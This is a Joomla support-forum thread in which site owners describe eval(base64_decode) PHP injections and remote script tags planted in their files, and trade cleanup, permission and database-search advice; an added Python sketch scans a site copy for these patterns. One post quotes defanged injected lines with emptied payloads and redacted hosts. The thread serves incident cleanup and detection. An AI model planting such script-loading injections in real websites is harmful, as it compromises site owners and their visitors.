eval(base64_decode [SOLVED]

elindalo
Joomla! Fledgling
Posts: 3
Joined: Sun Dec 09, 2007 9:54 pm

eval(base64_decode [SOLVED]

Post by elindalo » Mon Dec 15, 2008 4:58 pm

Hello all! On many pages of my website a strange code appears: "<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFyd..............." and they have links to other external pages, and my pages don't open completely. This is an example: http://xxxxxxxxxx where you can see my problem. I have read a lot about this topic on the internet, but nobody gives a solution. Please, I delete every eval(base64.... that I see in my pages, but that doesn't fix everything. Must I delete something more? Sorry for my poor English, and thanks in advance for your help. I think many people have this problem. Please, what can I do? Greetings from Spain.
Last edited by elindalo on Fri Dec 19, 2008 2:26 pm, edited 1 time in total.

dragonrider
Joomla! Ace
Posts: 1070
Joined: Mon Aug 22, 2005 7:53 pm
Location: Ilkley, West Yorkshire, UK

Re: eval(base64_decode

Post by dragonrider » Wed Dec 17, 2008 12:21 pm

Check the configuration.php, index.php and templates/index.php files for the hacked code. Delete the code and resave. See if that fixes it. You will also need to make sure your files are set to no higher than 644 via CHMOD permissions.

elindalo
Joomla! Fledgling
Posts: 3
Joined: Sun Dec 09, 2007 9:54 pm

Re: eval(base64_decode [SOLVED]

Post by elindalo » Fri Dec 19, 2008 2:24 pm

SOLVED

First, thank you very much, dragonrider, for your answer. I followed those steps and deleted all the eval(base... code that appeared in these pages.

The problem continued. Some pages still had the error. I had to grin and bear it. Third-party parts and permissions, with "a little" flippancy on my part. I am the only one to blame.

SOLUTION:

Hallelujah!! At last! I saw a lot of eval(base... code in the FCKEDITOR folder; I discovered the problem was there. I deleted that folder completely.

Next, I set, for the first time in my Joomla life, all folders and files to 755 and 644. Now, if I need to change a permission, I do it and return to the secure permission when I finish the operation.

Lesson for me: all permissions are sacred now.

I hope this helps other members of this nice community. Greetings!

tez
Joomla! Enthusiast
Posts: 248
Joined: Tue Nov 14, 2006 3:29 am

Re: eval(base64_decode [SOLVED]

Post by tez » Tue Jun 08, 2010 3:24 am

Just had this happen to me today. I have cleaned my website, but in case someone else needs to know, see below.
- Change your FTP password first.
- Download entire site.
- Delete all files on site (make another backup first!)
- Find/Replace all bad code by checking file modified dates and finding all bad code; this is usually different every few days.

These were the lines inserted into various files.

<?php eval(base64_decode('')); ?>
<?php eval(base64_decode('')); ?>
<script src=http://deleted/celebs/rumble.php ></script>


document.write('<script src=http://deleted.co.uk/images/deleted.php ><\/script>');
document.write('<script src=http://deleted/celebs/rumble.php ><\/script>');
document.write('<script src=http://deleted/celebs/rumble.php ><\/script>');
Also it created some files.

gifimg.php
changes.php
Last edited by mandville on Tue Jun 08, 2010 9:11 am, edited 1 time in total.
Reason: do not post infected code, links to infected code,
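
An added example, not part of any post in this thread: a Python sketch that automates what the posts above do by hand, scanning a downloaded copy of the site for the injection patterns quoted by tez and for files or folders more permissive than the 644/755 the posters settled on. The function names, pattern labels and the constructed sample tree are assumptions made for illustration.

```python
import os, re, stat, tempfile

# Signatures derived from the injected lines quoted in this thread.
PATTERNS = {
    "eval_base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    "remote_php_script": re.compile(rb"<script\s+src=[\"']?https?://[^\s>\"']+\.php", re.I),
}
SCAN_EXT = (".php", ".js", ".html", ".htm")

def scan_site(root, max_file_mode=0o644, max_dir_mode=0o755):
    """Return sorted (relative_path, finding) tuples for the tree under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # do not follow or judge symlinks
            mode = stat.S_IMODE(st.st_mode)
            limit = max_dir_mode if stat.S_ISDIR(st.st_mode) else max_file_mode
            if mode & ~limit:  # any permission bit beyond the allowed maximum
                findings.append((rel, "mode %o exceeds %o" % (mode, limit)))
            if stat.S_ISREG(st.st_mode) and name.lower().endswith(SCAN_EXT):
                with open(path, "rb") as fh:
                    data = fh.read()
                findings += [(rel, label) for label, rx in PATTERNS.items() if rx.search(data)]
    return sorted(findings)

def build_sample_tree():
    """Constructed sample site: one clean, one injected, one over-permissive file."""
    root = tempfile.mkdtemp(prefix="site_")
    samples = {
        "index.php": (b"<?php echo 'hello'; ?>\n", 0o644),
        "templates/index.php": (b"<?php /**/eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n", 0o644),
        "images/banner.js": (b"document.write('<script src=http://example.invalid/x.php ><\\/script>');\n", 0o666),
    }
    for rel, (data, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        os.chmod(os.path.dirname(path), 0o755)  # fixed mode, independent of umask
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    for rel, finding in scan_site(build_sample_tree()):
        print(rel, finding)
```

A hit list from this scan shows only where injected code or loose permissions are visible in the copy; it says nothing about how the files came to be modified.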

toner728
Joomla! Intern
Posts: 57
Joined: Wed Aug 27, 2008 1:55 pm
Location: New York City

Re: eval(base64_decode [SOLVED]

Post by toner728 » Wed Apr 24, 2013 2:57 pm

Ok so.. I had this issue with several of my sites and I have fixed it very easily. First of all, it happened because the permissions of my folders were writable. Shame on the original webmaster. This is how I fixed it.
I don't know what kind of web editor you guys use.. I use Dreamweaver.
So.. I pulled down the entire site to a folder. Dreamweaver has a Ctrl-F function which lets you do a search on a file "or the entire site". Do an entire site search for that base64 code and leave the replace field with nothing.. Blank!! It will search and remove the code from the entire site. Then just do a sync to put newer files back to the server and you will be good.. I did this with 8 different sites and they are all clean.

Tonie
Joomla! Master
Posts: 16553
Joined: Thu Aug 18, 2005 7:13 am

Re: eval(base64_decode [SOLVED]

Post by Tonie » Wed Apr 24, 2013 6:25 pm

Good that it's solved for you in this way. However, the cause of the hack hasn't been taken away by doing this.

toner728
Joomla! Intern
Posts: 57
Joined: Wed Aug 27, 2008 1:55 pm
Location: New York City

Re: eval(base64_decode [SOLVED]

Post by toner728 » Wed Apr 24, 2013 8:23 pm

Obviously the permissions have to be set as well as passwords changed.
Did I really have to mention that?

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: eval(base64_decode [SOLVED]

Post by mandville » Wed Apr 24, 2013 9:56 pm

toner728 wrote: Obviously the permissions have to be set as well as passwords changed.
Did I really have to mention that?

Might be best to run and post the FPA after running security checklist 7.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Tonie
Joomla! Master
Posts: 16553
Joined: Thu Aug 18, 2005 7:13 am

Re: eval(base64_decode [SOLVED]

Post by Tonie » Thu Apr 25, 2013 8:19 am

If I understood you correctly, you did the following:

- you removed the nasty code by search/replace
- then set permissions/changed passwords

This takes care of the hack showing to the public. Now the question is, how did the hacker enter your site in the first place? Through Joomla, webserver, one of the extensions, etc. This is not done just by the permissions on the server.

pictureperfectne
Joomla! Intern
Posts: 54
Joined: Sat Dec 02, 2006 3:41 am
Location: Stafford Springs CT

Re: eval(base64_decode [SOLVED]

Post by pictureperfectne » Fri Jun 21, 2013 4:59 pm

I'm probably late to the game, but my host told me yesterday that only my Joomla site out of all their hundreds of clients got hacked. Every PHP file in every folder was infected with eval(base64_decode in it; that's hundreds of files. I got a clean Joomla zip file, uploaded and overlaid all of the Joomla core files and then went through to clean up the rest.
The only way to access the root folder to do this kind of damage is through server access like FTP. Does anyone have an htaccess file that uses IP addresses instead of password and user, because it somehow broke through the server using an HTTP request? And was changing the permissions a good fix?

Thanks
Picture  Perfect of New England
Middle River Art Gallery
http://www.middlerivergallery.com

toner728
Joomla! Intern
Posts: 57
Joined: Wed Aug 27, 2008 1:55 pm
Location: New York City

Re: eval(base64_decode [SOLVED]

Post by toner728 » Sat Jun 22, 2013 11:03 am

@pictureperfectne.. I would do a search in the DB because when it happened to us, our client's database had the code in it as well.

pictureperfectne
Joomla! Intern
Posts: 54
Joined: Sat Dec 02, 2006 3:41 am
Location: Stafford Springs CT

Re: eval(base64_decode [SOLVED]

Post by pictureperfectne » Sat Jun 22, 2013 1:31 pm

Thanks for the heads up. I'll do a SQL dump and a keyword search. I really think that I need to protect the folders better with htaccess.